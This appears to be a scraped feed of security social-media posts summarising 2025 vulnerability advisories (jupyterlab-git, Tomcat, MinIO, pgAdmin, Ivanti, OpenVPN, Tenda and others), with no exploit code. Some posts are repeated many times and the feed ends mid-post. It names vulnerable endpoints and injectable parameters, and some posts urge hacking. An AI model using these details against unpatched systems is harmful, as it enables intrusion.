This is kind of a fun command injection vuln in jupyterlab-git.

https://github.com/jupyterlab/jupyterlab-git/security/advisories/GHSA-cj5w-8mjf-r5f8

sev:HIGH 7.4 - CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:H

jupyterlab-git is a JupyterLab extension for version control using Git. On many platforms, a third party can create a Git repository under a name that includes a shell command substitution string in the syntax $(). These directory names are allowed in macOS and a majority of Linux distributions. If a user starts jupyter-lab in a parent directory of this inappropriately-named Git repository, opens it, and clicks "Git > Open Git Repository in Terminal" from the menu bar, then the injected command is run in the user's shell without the user's permission. This issue is occurring because when that menu entry is clicked, jupyterlab-git opens the terminal and runs cd through the shell to set the current directory. Doing so runs any command substitution strings present in the directory name, which leads to the command injection issue described here. A previous patch provided an incomplete fix. This vulnerability is fixed in 0.51.1.

https://nvd.nist.gov/vuln/detail/CVE-2025-30370

This is kind of a fun command injection vuln in jupyterlab-git.

https://github.com/jupyterlab/jupyterlab-git/security/advisories/GHSA-cj5w-8mjf-r5f8

sev:HIGH 7.4 - CVSS:3.1/AV:L/AC:H/PR:L/UI:R/S:C/C:L/I:H/A:H

jupyterlab-git is a JupyterLab extension for version control using Git. On many platforms, a third party can create a Git repository under a name that includes a shell command substitution string in the syntax $(). These directory names are allowed in macOS and a majority of Linux distributions. If a user starts jupyter-lab in a parent directory of this inappropriately-named Git repository, opens it, and clicks "Git > Open Git Repository in Terminal" from the menu bar, then the injected command is run in the user's shell without the user's permission. This issue is occurring because when that menu entry is clicked, jupyterlab-git opens the terminal and runs cd through the shell to set the current directory. Doing so runs any command substitution strings present in the directory name, which leads to the command injection issue described here. A previous patch provided an incomplete fix. This vulnerability is fixed in 0.51.1.

https://nvd.nist.gov/vuln/detail/CVE-2025-30370

An attacker gained remote code execution on an outdated, internet-facing web application. The .bash_history of the compromised user (tomcat) revealed that the attacker had downloaded "PwnKit" from GitHub - an exploit targeting CVE-2021-4034, a well-known privilege escalation vulnerability.

Out of curiosity, I read about the vulnerability, its mechanics, and, most importantly, the forensic traces it might leave behind. I found this well-written article that provides an excellent breakdown:

The Tale of CVE-2021-4034 (PwnKit) – The 13-Year-Old Bug [1]

It even includes a "Detecting Compromise" section—thank you! ❤️

I always emphasize to our analysts the importance of studying attack techniques and reviewing exploit source code. Even if everything isn’t immediately clear, you might identify hardcoded values within the code that serve as valuable IOCs for targeted threat-hunting.

[1] https://www.hackthebox.com/blog/The-tale-of-CVE-2021-4034-AKA-PwnKit-The-13-Year-Old-Bug

I don't know Snowplow but based on its homepage, I feel good about sharing some DoS vulns:

AI-Ready Behavioral Data to Power Analytics & Real-Time Operations

and

Collect high-quality first-party customer behavior data

https://support.snowplow.io/hc/en-us/articles/24757248229917-Critical-Snowplow-Security-Updates-Impact-on-Open-Source-Software-Users

https://support.snowplow.io/hc/en-us/articles/26318139354909-Update-Critical-Snowplow-Security-Updates-Impact-on-Open-Source-Software-Users

This is an update to our previous notification informing users of Snowplow Open Source Software releases (pre-2024)* of the release of security patches for 5 CVEs, of which 4 are critical DOS type issues.

CVE-2024-47212: Iglu Server Denial of Service #1

CVE-2024-47214: Iglu Server Denial of Service #2

CVE-2024-47217: Iglu Server Denial of Service #3

CVE-2024-56528: Collector Denial of Service

CVE-2024-47213: Enrich Denial of Service

CVE-2024-47215: Snowbridge Denial of Service

Yes, there are six CVEs there, not five. You can have an extra one. As a treat.

I don't know Snowplow but based on its homepage, I feel good about sharing some DoS vulns:

AI-Ready Behavioral Data to Power Analytics & Real-Time Operations

and

Collect high-quality first-party customer behavior data

https://support.snowplow.io/hc/en-us/articles/24757248229917-Critical-Snowplow-Security-Updates-Impact-on-Open-Source-Software-Users

https://support.snowplow.io/hc/en-us/articles/26318139354909-Update-Critical-Snowplow-Security-Updates-Impact-on-Open-Source-Software-Users

This is an update to our previous notification informing users of Snowplow Open Source Software releases (pre-2024)* of the release of security patches for 5 CVEs, of which 4 are critical DOS type issues.

CVE-2024-47212: Iglu Server Denial of Service #1

CVE-2024-47214: Iglu Server Denial of Service #2

CVE-2024-47217: Iglu Server Denial of Service #3

CVE-2024-56528: Collector Denial of Service

CVE-2024-47213: Enrich Denial of Service

CVE-2024-47215: Snowbridge Denial of Service

Yes, there are six CVEs there, not five. You can have an extra one. As a treat.

I don't know Snowplow but based on its homepage, I feel good about sharing some DoS vulns:

AI-Ready Behavioral Data to Power Analytics & Real-Time Operations

and

Collect high-quality first-party customer behavior data

https://support.snowplow.io/hc/en-us/articles/24757248229917-Critical-Snowplow-Security-Updates-Impact-on-Open-Source-Software-Users

https://support.snowplow.io/hc/en-us/articles/26318139354909-Update-Critical-Snowplow-Security-Updates-Impact-on-Open-Source-Software-Users

This is an update to our previous notification informing users of Snowplow Open Source Software releases (pre-2024)* of the release of security patches for 5 CVEs, of which 4 are critical DOS type issues.

CVE-2024-47212: Iglu Server Denial of Service #1

CVE-2024-47214: Iglu Server Denial of Service #2

CVE-2024-47217: Iglu Server Denial of Service #3

CVE-2024-56528: Collector Denial of Service

CVE-2024-47213: Enrich Denial of Service

CVE-2024-47215: Snowbridge Denial of Service

Yes, there are six CVEs there, not five. You can have an extra one. As a treat.

I don't know Snowplow but based on its homepage, I feel good about sharing some DoS vulns:

AI-Ready Behavioral Data to Power Analytics & Real-Time Operations

and

Collect high-quality first-party customer behavior data

https://support.snowplow.io/hc/en-us/articles/24757248229917-Critical-Snowplow-Security-Updates-Impact-on-Open-Source-Software-Users

https://support.snowplow.io/hc/en-us/articles/26318139354909-Update-Critical-Snowplow-Security-Updates-Impact-on-Open-Source-Software-Users

This is an update to our previous notification informing users of Snowplow Open Source Software releases (pre-2024)* of the release of security patches for 5 CVEs, of which 4 are critical DOS type issues.

CVE-2024-47212: Iglu Server Denial of Service #1

CVE-2024-47214: Iglu Server Denial of Service #2

CVE-2024-47217: Iglu Server Denial of Service #3

CVE-2024-56528: Collector Denial of Service

CVE-2024-47213: Enrich Denial of Service

CVE-2024-47215: Snowbridge Denial of Service

Yes, there are six CVEs there, not five. You can have an extra one. As a treat.

I don't know Snowplow but based on its homepage, I feel good about sharing some DoS vulns:

AI-Ready Behavioral Data to Power Analytics & Real-Time Operations

and

Collect high-quality first-party customer behavior data

https://support.snowplow.io/hc/en-us/articles/24757248229917-Critical-Snowplow-Security-Updates-Impact-on-Open-Source-Software-Users

https://support.snowplow.io/hc/en-us/articles/26318139354909-Update-Critical-Snowplow-Security-Updates-Impact-on-Open-Source-Software-Users

This is an update to our previous notification informing users of Snowplow Open Source Software releases (pre-2024)* of the release of security patches for 5 CVEs, of which 4 are critical DOS type issues.

CVE-2024-47212: Iglu Server Denial of Service #1

CVE-2024-47214: Iglu Server Denial of Service #2

CVE-2024-47217: Iglu Server Denial of Service #3

CVE-2024-56528: Collector Denial of Service

CVE-2024-47213: Enrich Denial of Service

CVE-2024-47215: Snowbridge Denial of Service

Yes, there are six CVEs there, not five. You can have an extra one. As a treat.

I don't know Snowplow but based on its homepage, I feel good about sharing some DoS vulns:

AI-Ready Behavioral Data to Power Analytics & Real-Time Operations

and

Collect high-quality first-party customer behavior data

https://support.snowplow.io/hc/en-us/articles/24757248229917-Critical-Snowplow-Security-Updates-Impact-on-Open-Source-Software-Users

https://support.snowplow.io/hc/en-us/articles/26318139354909-Update-Critical-Snowplow-Security-Updates-Impact-on-Open-Source-Software-Users

This is an update to our previous notification informing users of Snowplow Open Source Software releases (pre-2024)* of the release of security patches for 5 CVEs, of which 4 are critical DOS type issues.

CVE-2024-47212: Iglu Server Denial of Service #1

CVE-2024-47214: Iglu Server Denial of Service #2

CVE-2024-47217: Iglu Server Denial of Service #3

CVE-2024-56528: Collector Denial of Service

CVE-2024-47213: Enrich Denial of Service

CVE-2024-47215: Snowbridge Denial of Service

Yes, there are six CVEs there, not five. You can have an extra one. As a treat.

I don't know Snowplow but based on its homepage, I feel good about sharing some DoS vulns:

AI-Ready Behavioral Data to Power Analytics & Real-Time Operations

and

Collect high-quality first-party customer behavior data

https://support.snowplow.io/hc/en-us/articles/24757248229917-Critical-Snowplow-Security-Updates-Impact-on-Open-Source-Software-Users

https://support.snowplow.io/hc/en-us/articles/26318139354909-Update-Critical-Snowplow-Security-Updates-Impact-on-Open-Source-Software-Users

This is an update to our previous notification informing users of Snowplow Open Source Software releases (pre-2024)* of the release of security patches for 5 CVEs, of which 4 are critical DOS type issues.

CVE-2024-47212: Iglu Server Denial of Service #1

CVE-2024-47214: Iglu Server Denial of Service #2

CVE-2024-47217: Iglu Server Denial of Service #3

CVE-2024-56528: Collector Denial of Service

CVE-2024-47213: Enrich Denial of Service

CVE-2024-47215: Snowbridge Denial of Service

Yes, there are six CVEs there, not five. You can have an extra one. As a treat.

I don't know Snowplow but based on its homepage, I feel good about sharing some DoS vulns:

AI-Ready Behavioral Data to Power Analytics & Real-Time Operations

and

Collect high-quality first-party customer behavior data

https://support.snowplow.io/hc/en-us/articles/24757248229917-Critical-Snowplow-Security-Updates-Impact-on-Open-Source-Software-Users

https://support.snowplow.io/hc/en-us/articles/26318139354909-Update-Critical-Snowplow-Security-Updates-Impact-on-Open-Source-Software-Users

This is an update to our previous notification informing users of Snowplow Open Source Software releases (pre-2024)* of the release of security patches for 5 CVEs, of which 4 are critical DOS type issues.

CVE-2024-47212: Iglu Server Denial of Service #1

CVE-2024-47214: Iglu Server Denial of Service #2

CVE-2024-47217: Iglu Server Denial of Service #3

CVE-2024-56528: Collector Denial of Service

CVE-2024-47213: Enrich Denial of Service

CVE-2024-47215: Snowbridge Denial of Service

Yes, there are six CVEs there, not five. You can have an extra one. As a treat.

I don't know Snowplow but based on its homepage, I feel good about sharing some DoS vulns:

AI-Ready Behavioral Data to Power Analytics & Real-Time Operations

and

Collect high-quality first-party customer behavior data

https://support.snowplow.io/hc/en-us/articles/24757248229917-Critical-Snowplow-Security-Updates-Impact-on-Open-Source-Software-Users

https://support.snowplow.io/hc/en-us/articles/26318139354909-Update-Critical-Snowplow-Security-Updates-Impact-on-Open-Source-Software-Users

This is an update to our previous notification informing users of Snowplow Open Source Software releases (pre-2024)* of the release of security patches for 5 CVEs, of which 4 are critical DOS type issues.

CVE-2024-47212: Iglu Server Denial of Service #1

CVE-2024-47214: Iglu Server Denial of Service #2

CVE-2024-47217: Iglu Server Denial of Service #3

CVE-2024-56528: Collector Denial of Service

CVE-2024-47213: Enrich Denial of Service

CVE-2024-47215: Snowbridge Denial of Service

Yes, there are six CVEs there, not five. You can have an extra one. As a treat.

I don't know Snowplow but based on its homepage, I feel good about sharing some DoS vulns:

AI-Ready Behavioral Data to Power Analytics & Real-Time Operations

and

Collect high-quality first-party customer behavior data

https://support.snowplow.io/hc/en-us/articles/24757248229917-Critical-Snowplow-Security-Updates-Impact-on-Open-Source-Software-Users

https://support.snowplow.io/hc/en-us/articles/26318139354909-Update-Critical-Snowplow-Security-Updates-Impact-on-Open-Source-Software-Users

This is an update to our previous notification informing users of Snowplow Open Source Software releases (pre-2024)* of the release of security patches for 5 CVEs, of which 4 are critical DOS type issues.

CVE-2024-47212: Iglu Server Denial of Service #1

CVE-2024-47214: Iglu Server Denial of Service #2

CVE-2024-47217: Iglu Server Denial of Service #3

CVE-2024-56528: Collector Denial of Service

CVE-2024-47213: Enrich Denial of Service

CVE-2024-47215: Snowbridge Denial of Service

Yes, there are six CVEs there, not five. You can have an extra one. As a treat.

I don't know Snowplow but based on its homepage, I feel good about sharing some DoS vulns:

AI-Ready Behavioral Data to Power Analytics & Real-Time Operations

and

Collect high-quality first-party customer behavior data

https://support.snowplow.io/hc/en-us/articles/24757248229917-Critical-Snowplow-Security-Updates-Impact-on-Open-Source-Software-Users

https://support.snowplow.io/hc/en-us/articles/26318139354909-Update-Critical-Snowplow-Security-Updates-Impact-on-Open-Source-Software-Users

This is an update to our previous notification informing users of Snowplow Open Source Software releases (pre-2024)* of the release of security patches for 5 CVEs, of which 4 are critical DOS type issues.

CVE-2024-47212: Iglu Server Denial of Service #1

CVE-2024-47214: Iglu Server Denial of Service #2

CVE-2024-47217: Iglu Server Denial of Service #3

CVE-2024-56528: Collector Denial of Service

CVE-2024-47213: Enrich Denial of Service

CVE-2024-47215: Snowbridge Denial of Service

Yes, there are six CVEs there, not five. You can have an extra one. As a treat.

I don't know Snowplow but based on its homepage, I feel good about sharing some DoS vulns:

AI-Ready Behavioral Data to Power Analytics & Real-Time Operations

and

Collect high-quality first-party customer behavior data

https://support.snowplow.io/hc/en-us/articles/24757248229917-Critical-Snowplow-Security-Updates-Impact-on-Open-Source-Software-Users

https://support.snowplow.io/hc/en-us/articles/26318139354909-Update-Critical-Snowplow-Security-Updates-Impact-on-Open-Source-Software-Users

This is an update to our previous notification informing users of Snowplow Open Source Software releases (pre-2024)* of the release of security patches for 5 CVEs, of which 4 are critical DOS type issues.

CVE-2024-47212: Iglu Server Denial of Service #1

CVE-2024-47214: Iglu Server Denial of Service #2

CVE-2024-47217: Iglu Server Denial of Service #3

CVE-2024-56528: Collector Denial of Service

CVE-2024-47213: Enrich Denial of Service

CVE-2024-47215: Snowbridge Denial of Service

Yes, there are six CVEs there, not five. You can have an extra one. As a treat.

Tracked as CVE-2025-24813.

U.S. CISA adds Apache Tomcat flaw to its Known Exploited Vulnerabilities catalog https://securityaffairs.com/176129/security/u-s-cisa-adds-apache-tomcat-flaw-known-exploited-vulnerabilities-catalog.html

#Security

Tracked as CVE-2025-24813.

U.S. CISA adds Apache Tomcat flaw to its Known Exploited Vulnerabilities catalog https://securityaffairs.com/176129/security/u-s-cisa-adds-apache-tomcat-flaw-known-exploited-vulnerabilities-catalog.html

#Security

Aqua published a blog post on the TTPs ( including IOCs and samples ) used by an apparently CN-adjacent TA attacking Tomcat servers. The post doesn't specifically say that the vulnerability exploited is CVE-2025-24813 but in their mitigations section they say:

"Ensure that all vulnerabilities are patched. Particularly internet facing applications such as Tomcat servers. Vulnerabilities such as CVE-2025-24813 that are new, critical and actively exploited should be prioritized."

https://www.aquasec.com/blog/new-campaign-against-apache-tomcat/

CVE ID: CVE-2025-24813
Vendor: Apache
Product: Tomcat
Date Added: 2025-04-01
Vulnerability: Apache Tomcat Path Equivalence Vulnerability
Notes: https://lists.apache.org/thread/j5fkjv2k477os90nczf2v9l61fb0kkgq ; https://nvd.nist.gov/vuln/detail/CVE-2025-24813
CVE URL: https://nvd.nist.gov/vuln/detail/CVE-2025-24813

CISA has updated the KEV catalogue:

CVE-2025-24813: Apache Tomcat Path Equivalence Vulnerability https://www.cisa.gov/known-exploited-vulnerabilities-catalog?search_api_fulltext=&field_date_added_wrapper=all&sort_by=field_date_added&items_per_page=20 #CISA #cybersecurity #infosec #Apache

Also:

Two Industrial Control Systems Advisories https://www.cisa.gov/news-events/alerts/2025/04/01/cisa-releases-two-industrial-control-systems-advisories

Looks like CISA is now satisfied and has added CVE-2025-24813 (Apache Tomcat Path Equivalence Vulnerability ) to the KEV Catalog.

Apache Tomcat Vulnerability (CVE-2025-24813) Exploited to Execute Code on Servers https://cybersecuritynews.com/apache-tomcat-vulnerability-exploited/ #CyberSecurityNews #VulnerabilityNews #cybersecuritynews #CyberSecurity #cybersecurity #vulnerability

Fortinet added CVE-2025-24813, Apache Tomcat RCE (high) to its outbreak alerts yesterday: https://www.fortinet.com/fortiguard/labs @fortinet #cybersecurity #infosec #Apache

Details: https://fortiguard.fortinet.com/outbreak-alert/apache-tomcat-rce

(recordedfuture.com) Apache Tomcat: Critical Path Equivalence Vulnerability (CVE-2025-24813) NOT (yet) under active exploitation

https://www.recordedfuture.com/blog/apache-tomcat-cve-2025-24813-vulnerability-analysis

Insikt Group notes specifically that this vulnerability has not yet been observed as being actively exploited in the wild.

Summary:
This article details CVE-2025-24813, a critical path equivalence vulnerability in Apache Tomcat that allows unauthenticated remote code execution under specific conditions. The vulnerability affects multiple Tomcat versions (11.0.0-M1 to 11.0.2, 10.1.0-M1 to 10.1.34, 9.0.0-M1 to 9.0.98, and most 8.5.x versions). Greynoise has identified six malicious IP addresses attempting to exploit this vulnerability, targeting systems in the US, Japan, Mexico, South Korea, and Australia. Multiple proof-of-concept exploits have been published, increasing the risk of exploitation. Organizations are advised to upgrade to patched versions (11.0.3, 10.1.35, or 9.0.99) or implement network-level controls if immediate patching isn't possible.

#Cybersecurity #ThreatIntel #Tomcat #ActiveExploitation #ITW #Exploitation #Vulnerability #CVE202524813

Anyone use MinIO S3-compatible storage? They released a vuln you might be interested in.

https://github.com/minio/minio/security/advisories/GHSA-wg47-6jq2-q2hh

sev:HIGH 8.7 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N

MinIO is a High Performance Object Storage released under GNU Affero General Public License v3.0. The signature component of the authorization may be invalid, which would mean that as a client you can use any arbitrary secret to upload objects given the user already has prior WRITE permissions on the bucket. Prior knowledge of access-key, and bucket name this user might have access
to - and an access-key with a WRITE permissions is necessary. However with relevant information in place, uploading random objects to buckets is trivial and easy via curl. This issue is fixed in RELEASE.2025-04-03T14-56-28Z.

https://nvd.nist.gov/vuln/detail/CVE-2025-31489

Anyone use MinIO S3-compatible storage? They released a vuln you might be interested in.

https://github.com/minio/minio/security/advisories/GHSA-wg47-6jq2-q2hh

sev:HIGH 8.7 - CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N

MinIO is a High Performance Object Storage released under GNU Affero General Public License v3.0. The signature component of the authorization may be invalid, which would mean that as a client you can use any arbitrary secret to upload objects given the user already has prior WRITE permissions on the bucket. Prior knowledge of access-key, and bucket name this user might have access
to - and an access-key with a WRITE permissions is necessary. However with relevant information in place, uploading random objects to buckets is trivial and easy via curl. This issue is fixed in RELEASE.2025-04-03T14-56-28Z.

https://nvd.nist.gov/vuln/detail/CVE-2025-31489

If you or your targets are running pgAdmin for PostgreSQL, you might be interested in these.

https://github.com/pgadmin-org/pgadmin4/issues/8603

sev:CRIT 9.9 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Remote Code Execution security vulnerability in pgAdmin 4 (Query Tool and Cloud Deployment modules).

The vulnerability is associated with the 2 POST endpoints; /sqleditor/query_tool/download, where the query_commited parameter and /cloud/deploy endpoint, where the high_availability parameter is unsafely passed to the Python eval() function, allowing arbitrary code execution.

This issue affects pgAdmin 4: before 9.2.

https://nvd.nist.gov/vuln/detail/CVE-2025-2945

https://github.com/pgadmin-org/pgadmin4/issues/8602

sev:CRIT 9.1 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:H

pgAdmin <= 9.1 is affected by a security vulnerability with Cross-Site Scripting(XSS). If attackers execute any arbitrary HTML/JavaScript in a user's browser through query result rendering, then HTML/JavaScript runs on the browser.

https://nvd.nist.gov/vuln/detail/CVE-2025-2946

If you or your targets are running pgAdmin for PostgreSQL, you might be interested in these.

https://github.com/pgadmin-org/pgadmin4/issues/8603

sev:CRIT 9.9 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Remote Code Execution security vulnerability in pgAdmin 4 (Query Tool and Cloud Deployment modules).

The vulnerability is associated with the 2 POST endpoints; /sqleditor/query_tool/download, where the query_commited parameter and /cloud/deploy endpoint, where the high_availability parameter is unsafely passed to the Python eval() function, allowing arbitrary code execution.

This issue affects pgAdmin 4: before 9.2.

https://nvd.nist.gov/vuln/detail/CVE-2025-2945

https://github.com/pgadmin-org/pgadmin4/issues/8602

sev:CRIT 9.1 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:H

pgAdmin <= 9.1 is affected by a security vulnerability with Cross-Site Scripting(XSS). If attackers execute any arbitrary HTML/JavaScript in a user's browser through query result rendering, then HTML/JavaScript runs on the browser.

https://nvd.nist.gov/vuln/detail/CVE-2025-2946

If you or your targets are running pgAdmin for PostgreSQL, you might be interested in these.

https://github.com/pgadmin-org/pgadmin4/issues/8603

sev:CRIT 9.9 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Remote Code Execution security vulnerability in pgAdmin 4 (Query Tool and Cloud Deployment modules).

The vulnerability is associated with the 2 POST endpoints; /sqleditor/query_tool/download, where the query_commited parameter and /cloud/deploy endpoint, where the high_availability parameter is unsafely passed to the Python eval() function, allowing arbitrary code execution.

This issue affects pgAdmin 4: before 9.2.

https://nvd.nist.gov/vuln/detail/CVE-2025-2945

https://github.com/pgadmin-org/pgadmin4/issues/8602

sev:CRIT 9.1 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:H

pgAdmin <= 9.1 is affected by a security vulnerability with Cross-Site Scripting(XSS). If attackers execute any arbitrary HTML/JavaScript in a user's browser through query result rendering, then HTML/JavaScript runs on the browser.

https://nvd.nist.gov/vuln/detail/CVE-2025-2946

If you or your targets are running pgAdmin for PostgreSQL, you might be interested in these.

https://github.com/pgadmin-org/pgadmin4/issues/8603

sev:CRIT 9.9 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:H/I:H/A:H

Remote Code Execution security vulnerability in pgAdmin 4 (Query Tool and Cloud Deployment modules).

The vulnerability is associated with the 2 POST endpoints; /sqleditor/query_tool/download, where the query_commited parameter and /cloud/deploy endpoint, where the high_availability parameter is unsafely passed to the Python eval() function, allowing arbitrary code execution.

This issue affects pgAdmin 4: before 9.2.

https://nvd.nist.gov/vuln/detail/CVE-2025-2945

https://github.com/pgadmin-org/pgadmin4/issues/8602

sev:CRIT 9.1 - CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:H

pgAdmin <= 9.1 is affected by a security vulnerability with Cross-Site Scripting(XSS). If attackers execute any arbitrary HTML/JavaScript in a user's browser through query result rendering, then HTML/JavaScript runs on the browser.

https://nvd.nist.gov/vuln/detail/CVE-2025-2946

The CVE is published for this one. No CVSS yet though: https://nvd.nist.gov/vuln/detail/CVE-2025-30456

https://support.apple.com/en-us/122371

DiskArbitration

Available for: iPhone XS and later, iPad Pro 13-inch, iPad Pro 12.9-inch 3rd generation and later, iPad Pro 11-inch 1st generation and later, iPad Air 3rd generation and later, iPad 7th generation and later, and iPad mini 5th generation and later

Impact: An app may be able to gain root privileges

Description: A parsing issue in the handling of directory paths was addressed with improved path validation.

CVE-2025-30456: Gergely Kalman (@gergely_kalman)

https://nvd.nist.gov/vuln/detail/CVE-2025-30456

#lazy #directoryTraversalMemes

LPE in OpenVPN-GUI on Windows.

https://community.openvpn.net/openvpn/wiki/CVE-2024-4877

OpenVPN version 2.4.0 through 2.6.10 on Windows allows an external, lesser privileged process to create a named pipe which the OpenVPN GUI component would connect to allowing it to escalate its privileges

https://nvd.nist.gov/vuln/detail/CVE-2024-4877

LPE in OpenVPN-GUI on Windows.

https://community.openvpn.net/openvpn/wiki/CVE-2024-4877

OpenVPN version 2.4.0 through 2.6.10 on Windows allows an external, lesser privileged process to create a named pipe which the OpenVPN GUI component would connect to allowing it to escalate its privileges

https://nvd.nist.gov/vuln/detail/CVE-2024-4877

Suspected China-Nexus Threat Actor Actively Exploiting Critical Ivanti Connect Secure Vulnerability (CVE-2025-22457)
#CVE_2025_22457 #UNC5221 #TRAILBLAZE #BRUSHFIRE #SPAWNSNARE #SPAWNWAVE
https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability

🚨CVE-2025-22457: April Security Advisory Ivanti Connect Secure, Policy Secure & ZTA Gateways (CVE-2025-22457)

CVSS: 9.0

https://darkwebinformer.com/cve-2025-22457-april-security-advisory-ivanti-connect-secure-policy-secure-zta-gateways-cve-2025-22457/

Suspected China-Nexus Threat Actor Actively Exploiting Critical Ivanti Connect Secure Vulnerability (CVE-2025-22457) https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability/

Tracked as CVE-2025-22457.

Ivanti Security Update: Pulse Connect Secure, Ivanti Connect Secure, Policy Secure and Neurons for ZTA Gateways https://www.ivanti.com/blog/security-update-pulse-connect-secure-ivanti-connect-secure-policy-secure-and-neurons-for-zta-gateways #cybersecurity #infosec #Ivanti

Go hack some more Ivanti shit. Someone else already has been.

https://forums.ivanti.com/s/article/April-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-22457?language=en_US

sev:CRIT 9.0 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.6, Ivanti Policy Secure before version 22.7R1.4, and Ivanti ZTA Gateways before version 22.8R2.2 allows a remote unauthenticated attacker to achieve remote code execution.

https://nvd.nist.gov/vuln/detail/CVE-2025-22457

Edit to add:

We are aware of a limited number of customers whose Ivanti Connect Secure (22.7R2.5 or earlier) and End-of-Support Pulse Connect Secure 9.1x appliances have been exploited at the time of disclosure. Pulse Connect Secure 9.1x reached End-of-Support on December 31, 2024, and no longer receive code support or changes.

#ivanti #groundhogDay

ah tiens, ce serait donc celle-là la mystérieuse vulnérabilité en exploitation observée par les honeypots ? 👀

⚠️ Vulnérabilité critique chez Ivanti Connect Secure (CVE-2025-22457)

Mandiant signale qu’une faille critique affectant certaines versions des VPN Ivanti est activement exploitée depuis mars 2025. Des acteurs liés à la Chine (UNC5221) ont déployé plusieurs malwares furtifs, comme TRAILBLAZE (dropper en mémoire) et BRUSHFIRE (porte dérobée passive), via cette faille.

➡️ Un patch est dispo depuis février, mais la menace a été sous-estimée au départ.
➡️ Si vous utilisez Ivanti ICS, mettez à jour rapidement vers la version 22.7R2.6 ou ultérieure.

(Utilisez les outils d'intégrité d'Ivanti pour détecter toute activité anormale.)

"Suspected China-Nexus Threat Actor Actively Exploiting Critical Ivanti Connect Secure Vulnerability (CVE-2025-22457)"👇
https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability/?hl=en

#CyberVeille
#Ivanti #Mandiant #CVE_2025_22457 #infosec

🚨CVE-2025-22457: April Security Advisory Ivanti Connect Secure, Policy Secure & ZTA Gateways (CVE-2025-22457)

CVSS: 9.0

https://darkwebinformer.com/cve-2025-22457-april-security-advisory-ivanti-connect-secure-policy-secure-zta-gateways-cve-2025-22457/

Ivanti VPN customers targeted via unrecognized RCE vulnerability (CVE-2025-22457) https://www.helpnetsecurity.com/2025/04/03/ivanti-vpn-customers-targeted-via-unrecognized-rce-vulnerability-cve-2025-22457/ #cyberespionage #vulnerability #Don'tmiss #Hotstuff #Mandiant #Ivanti #News #VPN

Suspected China-Nexus Threat Actor Actively Exploiting Critical Ivanti Connect Secure Vulnerability (CVE-2025-22457) https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability/

Tracked as CVE-2025-22457.

Ivanti Security Update: Pulse Connect Secure, Ivanti Connect Secure, Policy Secure and Neurons for ZTA Gateways https://www.ivanti.com/blog/security-update-pulse-connect-secure-ivanti-connect-secure-policy-secure-and-neurons-for-zta-gateways #cybersecurity #infosec #Ivanti

Go hack some more Ivanti shit. Someone else already has been.

https://forums.ivanti.com/s/article/April-Security-Advisory-Ivanti-Connect-Secure-Policy-Secure-ZTA-Gateways-CVE-2025-22457?language=en_US

sev:CRIT 9.0 - CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H

A stack-based buffer overflow in Ivanti Connect Secure before version 22.7R2.6, Ivanti Policy Secure before version 22.7R1.4, and Ivanti ZTA Gateways before version 22.8R2.2 allows a remote unauthenticated attacker to achieve remote code execution.

https://nvd.nist.gov/vuln/detail/CVE-2025-22457

Edit to add:

We are aware of a limited number of customers whose Ivanti Connect Secure (22.7R2.5 or earlier) and End-of-Support Pulse Connect Secure 9.1x appliances have been exploited at the time of disclosure. Pulse Connect Secure 9.1x reached End-of-Support on December 31, 2024, and no longer receive code support or changes.

#ivanti #groundhogDay

ah tiens, ce serait donc celle-là la mystérieuse vulnérabilité en exploitation observée par les honeypots ? 👀

⚠️ Vulnérabilité critique chez Ivanti Connect Secure (CVE-2025-22457)

Mandiant signale qu’une faille critique affectant certaines versions des VPN Ivanti est activement exploitée depuis mars 2025. Des acteurs liés à la Chine (UNC5221) ont déployé plusieurs malwares furtifs, comme TRAILBLAZE (dropper en mémoire) et BRUSHFIRE (porte dérobée passive), via cette faille.

➡️ Un patch est dispo depuis février, mais la menace a été sous-estimée au départ.
➡️ Si vous utilisez Ivanti ICS, mettez à jour rapidement vers la version 22.7R2.6 ou ultérieure.

(Utilisez les outils d'intégrité d'Ivanti pour détecter toute activité anormale.)

"Suspected China-Nexus Threat Actor Actively Exploiting Critical Ivanti Connect Secure Vulnerability (CVE-2025-22457)"👇
https://cloud.google.com/blog/topics/threat-intelligence/china-nexus-exploiting-critical-ivanti-vulnerability/?hl=en

#CyberVeille
#Ivanti #Mandiant #CVE_2025_22457 #infosec

. @Dio9sys I suppose there may be others who care about Tenda vulns so here you go.

sev:HIGH 8.7 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

A vulnerability was found in Tenda AC10 16.03.10.13 and classified as critical. This issue affects the function ShutdownSetAdd of the file /goform/ShutdownSetAdd. The manipulation of the argument list leads to stack-based buffer overflow. The attack may be initiated remotely. The exploit has been disclosed to the public and may be used.

https://nvd.nist.gov/vuln/detail/CVE-2025-3161

. @Dio9sys I suppose there may be others who care about Tenda vulns so here you go.

sev:HIGH 8.7 - CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N

